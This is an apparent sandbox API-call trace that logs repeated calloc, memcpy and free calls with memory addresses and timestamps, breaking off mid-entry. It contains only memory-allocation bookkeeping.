[0064.108] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.108] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.108] free (_Block=0x5313d8) [0064.108] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.108] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.108] free (_Block=0x5313d8) [0064.108] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.108] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.108] free (_Block=0x5313d8) [0064.108] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.108] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.108] free (_Block=0x5313d8) [0064.108] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.108] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.108] free (_Block=0x5313d8) [0064.108] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.108] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.109] free (_Block=0x5313d8) [0064.109] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.109] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.109] free (_Block=0x5313d8) [0064.109] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.109] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.109] free (_Block=0x5313d8) [0064.109] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.109] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.109] free (_Block=0x5313d8) [0064.109] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.109] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.109] free (_Block=0x5313d8) [0064.109] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.109] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.109] free (_Block=0x5313d8) [0064.109] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.109] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.109] free (_Block=0x5313d8) [0064.109] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.109] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.109] free (_Block=0x5313d8) [0064.109] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.109] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.109] free (_Block=0x5313d8) [0064.110] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.110] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.110] free (_Block=0x5313d8) [0064.110] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.110] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.110] free (_Block=0x5313d8) [0064.110] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.110] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.110] free (_Block=0x5313d8) [0064.110] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.110] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.110] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.110] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.110] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.110] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.110] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.110] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.110] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.110] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.110] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.110] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.110] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.110] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.110] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.110] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.111] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.111] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.111] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.111] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.111] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.111] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.111] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.111] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.111] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.111] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.111] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.111] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.111] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.111] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.111] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.111] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.111] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.111] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.111] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.111] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.111] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.111] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.111] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.111] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.111] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.111] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.111] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.112] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.112] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.112] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.112] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.112] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.112] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.112] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.112] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.112] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.112] calloc (_Count=0x20, _Size=0x4) returned 0x53d960 [0064.112] memcpy (in: _Dst=0x53d960, _Src=0x53d838, _Size=0x80 | out: _Dst=0x53d960) returned 0x53d960 [0064.112] calloc (_Count=0x20, _Size=0x4) returned 0x53d8d8 [0064.112] memcpy (in: _Dst=0x53d8d8, _Src=0x53d960, _Size=0x80 | out: _Dst=0x53d8d8) returned 0x53d8d8 [0064.132] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0064.142] memcpy (in: _Dst=0x2061250, _Src=0x2063050, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0064.147] memcpy (in: _Dst=0x2061250, _Src=0x2063050, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0064.164] memcpy (in: _Dst=0x2061250, _Src=0x2062bf0, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0064.181] memcpy (in: _Dst=0x2061250, _Src=0x2063050, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0064.183] memcpy (in: _Dst=0x2061250, _Src=0x2063050, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0064.194] memcpy (in: _Dst=0x2061250, _Src=0x2062f38, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0064.209] memcpy (in: _Dst=0x2061250, _Src=0x2062f38, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0064.225] memcpy (in: _Dst=0x2061250, _Src=0x2063050, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0064.237] memcpy (in: _Dst=0x2061250, _Src=0x2062bf0, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0065.364] memcpy (in: _Dst=0x2061250, _Src=0x2062f38, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0065.380] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0065.395] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0065.410] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0065.426] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0065.442] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0065.453] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0065.923] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0065.928] memcpy (in: _Dst=0x2061250, _Src=0x2062bf0, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0065.937] memcpy (in: _Dst=0x2061130, _Src=0x2062f38, _Size=0x84 | out: _Dst=0x2061130) returned 0x2061130 [0065.937] memcpy (in: _Dst=0x2060b00, _Src=0x2062f38, _Size=0x84 | out: _Dst=0x2060b00) returned 0x2060b00 [0065.940] memcpy (in: _Dst=0x2061250, _Src=0x2062f38, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0065.956] memcpy (in: _Dst=0x2061250, _Src=0x2063050, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0065.985] memcpy (in: _Dst=0x2061250, _Src=0x2063050, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0068.398] memcpy (in: _Dst=0x53d8d8, _Src=0x53d838, _Size=0x80 | out: _Dst=0x53d8d8) returned 0x53d8d8 [0068.399] memcpy (in: _Dst=0x53dc08, _Src=0x53d8d8, _Size=0x80 | out: _Dst=0x53dc08) returned 0x53dc08 [0068.399] memcpy (in: _Dst=0x53dc90, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53dc90) returned 0x53dc90 [0068.399] memcpy (in: _Dst=0x53dca0, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53dca0) returned 0x53dca0 [0068.399] memcpy (in: _Dst=0x53dcb0, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53dcb0) returned 0x53dcb0 [0068.399] memcpy (in: _Dst=0x53dcc0, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53dcc0) returned 0x53dcc0 [0068.399] memcpy (in: _Dst=0x53dcd0, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53dcd0) returned 0x53dcd0 [0068.399] memcpy (in: _Dst=0x53dce0, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53dce0) returned 0x53dce0 [0068.399] memcpy (in: _Dst=0x53dcf0, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53dcf0) returned 0x53dcf0 [0068.399] memcpy (in: _Dst=0x53dd00, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53dd00) returned 0x53dd00 [0068.399] memcpy (in: _Dst=0x53dc90, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53dc90) returned 0x53dc90 [0068.399] memcpy (in: _Dst=0x53dca0, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53dca0) returned 0x53dca0 [0068.399] memcpy (in: _Dst=0x53dcb0, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53dcb0) returned 0x53dcb0 [0068.399] memcpy (in: _Dst=0x53dcc0, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53dcc0) returned 0x53dcc0 [0068.399] memcpy (in: _Dst=0x53dcd0, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53dcd0) returned 0x53dcd0 [0068.399] memcpy (in: _Dst=0x53dce0, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53dce0) returned 0x53dce0 [0068.399] memcpy (in: _Dst=0x53dcf0, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53dcf0) returned 0x53dcf0 [0068.399] memcpy (in: _Dst=0x53dd00, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53dd00) returned 0x53dd00 [0068.399] memcpy (in: _Dst=0x2061250, _Src=0x53dc90, _Size=0x80 | out: _Dst=0x2061250) returned 0x2061250 [0068.399] memcpy (in: _Dst=0x2062da0, _Src=0x2064b80, _Size=0x4 | out: _Dst=0x2062da0) returned 0x2062da0 [0068.399] memcpy (in: _Dst=0x2062eb8, _Src=0x2062da0, _Size=0x104 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0068.399] memcpy (in: _Dst=0x53dc90, _Src=0x53d838, _Size=0x80 | out: _Dst=0x53dc90) returned 0x53dc90 [0068.405] memcpy (in: _Dst=0x2061250, _Src=0x2063050, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0068.424] memcpy (in: _Dst=0x2061250, _Src=0x2062f38, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0068.433] memcpy (in: _Dst=0x2061250, _Src=0x2062e20, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0068.436] memcpy (in: _Dst=0x2061250, _Src=0x2062f38, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0068.453] memcpy (in: _Dst=0x2061250, _Src=0x2063050, _Size=0x84 | out: _Dst=0x2061250) returned 0x2061250 [0068.456] free (_Block=0x2061be0) [0068.456] free (_Block=0x2061b50) [0068.456] free (_Block=0x2061ac0) [0068.456] free (_Block=0x2061a30) [0068.456] free (_Block=0x20619a0) [0068.456] free (_Block=0x2061910) [0068.457] free (_Block=0x2061880) [0068.457] free (_Block=0x20617f0) [0068.457] free (_Block=0x2061760) [0068.457] free (_Block=0x20616d0) [0068.457] free (_Block=0x2061640) [0068.457] free (_Block=0x20615b0) [0068.457] free (_Block=0x2061520) [0068.457] free (_Block=0x2061490) [0068.457] free (_Block=0x2061400) [0068.457] free (_Block=0x2061370) [0068.457] free (_Block=0x20612e0) [0068.457] free (_Block=0x2060950) [0068.457] free (_Block=0x20609e0) [0068.457] free (_Block=0x2060a70) [0068.457] free (_Block=0x2060b00) [0068.458] free (_Block=0x2060b90) [0068.458] free (_Block=0x2060c20) [0068.458] free (_Block=0x2060cb0) [0068.458] free (_Block=0x2060d40) [0068.458] free (_Block=0x2060dd0) [0068.458] free (_Block=0x2060e60) [0068.458] free (_Block=0x2060ef0) [0068.458] free (_Block=0x2060f80) [0068.458] free (_Block=0x2061010) [0068.458] free (_Block=0x20610a0) [0068.458] free (_Block=0x2061130) [0068.458] free (_Block=0x20611c0) [0068.459] free (_Block=0x2062fd0) [0068.459] free (_Block=0x53dc08) [0068.459] free (_Block=0x53d8d8) [0068.460] free (_Block=0x2061250) [0068.460] free (_Block=0x2062da0) [0068.460] calloc (_Count=0x20, _Size=0x4) returned 0x53d8d8 [0068.461] memcpy (in: _Dst=0x53d8d8, _Src=0x53d838, _Size=0x80 | out: _Dst=0x53d8d8) returned 0x53d8d8 [0068.461] calloc (_Count=0x20, _Size=0x4) returned 0x53dc08 [0068.461] memcpy (in: _Dst=0x53dc08, _Src=0x53d8d8, _Size=0x80 | out: _Dst=0x53dc08) returned 0x53dc08 [0068.461] calloc (_Count=0x20, _Size=0x4) returned 0x53dc90 [0068.461] calloc (_Count=0x21, _Size=0x4) returned 0x2061250 [0068.461] memcpy (in: _Dst=0x2061250, _Src=0x53dc90, _Size=0x80 | out: _Dst=0x2061250) returned 0x2061250 [0068.461] free (_Block=0x53dc90) [0068.461] calloc (_Count=0x21, _Size=0x4) returned 0x20611c0 [0068.461] calloc (_Count=0x42, _Size=0x4) returned 0x2062da0 [0068.461] calloc (_Count=0x1, _Size=0x4) returned 0x2064b80 [0068.461] calloc (_Count=0x41, _Size=0x4) returned 0x2062fd0 [0068.461] memcpy (in: _Dst=0x2062fd0, _Src=0x2064b80, _Size=0x4 | out: _Dst=0x2062fd0) returned 0x2062fd0 [0068.461] free (_Block=0x2064b80) [0068.461] calloc (_Count=0x41, _Size=0x4) returned 0x2062b70 [0068.461] memcpy (in: _Dst=0x2062b70, _Src=0x2062fd0, _Size=0x104 | out: _Dst=0x2062b70) returned 0x2062b70 [0068.462] calloc (_Count=0x20, _Size=0x4) returned 0x53dc90 [0068.462] memcpy (in: _Dst=0x53dc90, _Src=0x53d838, _Size=0x80 | out: _Dst=0x53dc90) returned 0x53dc90 [0068.462] calloc (_Count=0x43, _Size=0x4) returned 0x2060448 [0068.462] calloc (_Count=0x2, _Size=0x4) returned 0x2064b80 [0068.462] calloc (_Count=0x3, _Size=0x4) returned 0x2060060 [0068.462] calloc (_Count=0x21, _Size=0x4) returned 0x2061130 [0068.462] memcpy (in: _Dst=0x2061130, _Src=0x53dc90, _Size=0x80 | out: _Dst=0x2061130) returned 0x2061130 [0068.462] free (_Block=0x53dc90) [0068.462] calloc (_Count=0x41, _Size=0x4) returned 0x2062c88 [0068.462] memcpy (in: _Dst=0x2062c88, _Src=0x2061130, _Size=0x84 | out: _Dst=0x2062c88) returned 0x2062c88 [0068.462] free (_Block=0x2061130) [0068.462] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.463] memcpy (in: _Dst=0x2064b70, _Src=0x2064b80, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.463] calloc (_Count=0x3, _Size=0x4) returned 0x2060078 [0068.463] memcpy (in: _Dst=0x2060078, _Src=0x2064b80, _Size=0x8 | out: _Dst=0x2060078) returned 0x2060078 [0068.463] free (_Block=0x2064b80) [0068.463] free (_Block=0x2064b70) [0068.463] calloc (_Count=0x22, _Size=0x4) returned 0x2061130 [0068.463] memcpy (in: _Dst=0x2061130, _Src=0x2060078, _Size=0xc | out: _Dst=0x2061130) returned 0x2061130 [0068.463] free (_Block=0x2060078) [0068.463] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0068.463] memcpy (in: _Dst=0x2062eb8, _Src=0x2061130, _Size=0x88 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0068.463] free (_Block=0x2061130) [0068.463] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.463] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.463] free (_Block=0x2064b70) [0068.463] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.463] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.463] free (_Block=0x2064b70) [0068.464] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.464] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.464] free (_Block=0x2064b70) [0068.464] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.464] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.464] free (_Block=0x2064b70) [0068.464] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.464] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.464] free (_Block=0x2064b70) [0068.464] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.464] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.464] free (_Block=0x2064b70) [0068.464] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.464] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.464] free (_Block=0x2064b70) [0068.464] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.464] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.464] free (_Block=0x2064b70) [0068.464] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.464] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.464] free (_Block=0x2064b70) [0068.465] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.465] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.465] free (_Block=0x2064b70) [0068.465] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.465] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.465] free (_Block=0x2064b70) [0068.465] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.465] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.465] free (_Block=0x2064b70) [0068.465] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.465] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.465] free (_Block=0x2064b70) [0068.465] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.465] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.465] free (_Block=0x2064b70) [0068.465] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.465] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.465] free (_Block=0x2064b70) [0068.465] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.465] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.465] free (_Block=0x2064b70) [0068.466] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.466] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.466] free (_Block=0x2064b70) [0068.466] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.466] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.466] free (_Block=0x2064b70) [0068.466] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.466] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.466] free (_Block=0x2064b70) [0068.466] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.466] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.466] free (_Block=0x2064b70) [0068.466] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.466] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.466] free (_Block=0x2064b70) [0068.466] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.466] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.466] free (_Block=0x2064b70) [0068.466] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.466] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.466] free (_Block=0x2064b70) [0068.467] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.467] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.467] free (_Block=0x2064b70) [0068.467] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.467] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.467] free (_Block=0x2064b70) [0068.467] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.467] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.467] free (_Block=0x2064b70) [0068.467] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.467] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.467] free (_Block=0x2064b70) [0068.467] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.467] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.467] free (_Block=0x2064b70) [0068.467] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.467] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.470] free (_Block=0x2064b70) [0068.470] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.470] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.471] free (_Block=0x2064b70) [0068.471] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.471] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.471] free (_Block=0x2064b70) [0068.471] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.471] memcpy (in: _Dst=0x2064b70, _Src=0x2062eb8, _Size=0x8 | out: _Dst=0x2064b70) returned 0x2064b70 [0068.471] free (_Block=0x2064b70) [0068.471] calloc (_Count=0x2, _Size=0x4) returned 0x2064b70 [0068.471] memcpy (in: _Dst=0x2064b70, 